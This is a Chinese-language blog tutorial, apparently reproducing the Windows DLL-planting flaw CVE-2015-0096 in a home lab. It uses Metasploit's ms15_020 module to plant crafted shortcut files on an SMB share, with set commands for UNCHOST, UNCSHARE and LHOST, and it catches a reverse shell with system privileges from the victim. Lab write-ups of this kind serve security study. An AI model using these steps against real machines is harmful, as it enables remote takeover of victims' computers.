溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

發(fā)布時(shí)間:2021-12-29 15:41:33 來(lái)源:億速云 閱讀:204 作者:柒染 欄目:網(wǎng)絡(luò)安全

這篇文章給大家介紹Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。

漏洞成因

    Microsoft Windows沒有正確處理DLL文件的加載,存在遠(yuǎn)程代碼執(zhí)行漏洞,通過(guò)誘使用戶打開遠(yuǎn)程WebDAV或SMB共享上的某些文件利用此漏洞,成功利用后可導(dǎo)致加載任意庫(kù)。Windows使用.lnk來(lái)定義文件或者目錄的快捷方式,可以使用.CPL文件來(lái)自定義圖標(biāo)。問(wèn)題是,在Windows中,圖標(biāo)從模塊(或者可執(zhí)行文件或動(dòng)態(tài)鏈接庫(kù))加載。事實(shí)上,.cpl文件實(shí)際上是DLL文件。因?yàn)楣粽呖梢远x哪些可執(zhí)行模塊會(huì)被加載,攻擊者可以利用.LNK文件來(lái)執(zhí)行任意代碼。

漏洞環(huán)境

入侵主機(jī)linux:192.168.1.125

共享文件主機(jī)win7:192.168.1.102

受害者主機(jī)win7:192.168.1.109

漏洞復(fù)現(xiàn)

準(zhǔn)備好兩臺(tái)Windows7的主機(jī)環(huán)境,搭建好一個(gè),直接拷貝速度更快。

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

克隆一份Windows7:

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

在一臺(tái)win7主機(jī)上的C盤中創(chuàng)建share文件夾,并進(jìn)行共享。

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

在第二臺(tái)主機(jī)上查看是否共享成功。

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

共享成功后,所需要的環(huán)境條件就以達(dá)成,接下來(lái)使用攻擊機(jī)器kali Linux進(jìn)行攻擊。所使用工具為msf。

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

搜索相關(guān)漏洞:ms15_020

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

利用相關(guān)漏洞模塊:

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

設(shè)置一個(gè)反彈shell:

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

查看需要設(shè)置的參數(shù):

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

設(shè)置好參數(shù),設(shè)置漏洞利用模塊列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.102

設(shè)置為文件共享主機(jī)地址

set UNCSHARE share

設(shè)置共享文件的文件夾,這里主機(jī)192.168.1.102在C盤下的share里文件夾開啟了共享,提前創(chuàng)建好共享

set LHOST 192.168.1.125

設(shè)置漏洞成功利用后后門連接的地址

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

Exploit

執(zhí)行漏洞

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

生成了幾個(gè)文件,我們?nèi)ド傻哪夸浵掳盐募截惖焦蚕碇鳈C(jī)的共享文件夾下:

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

可能會(huì)提示如下:Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

利用重命名解決問(wèn)題,記得改回。

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

受害者訪問(wèn)共享后,成功了觸發(fā)了漏洞。

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

可以發(fā)現(xiàn)入侵者這邊彈回來(lái)了一個(gè)回話session 1

Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析

成功獲取到系統(tǒng)權(quán)限。

關(guān)于Microsoft DLL植入遠(yuǎn)程代碼執(zhí)行漏洞CVE-2015-0096方示例分析就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI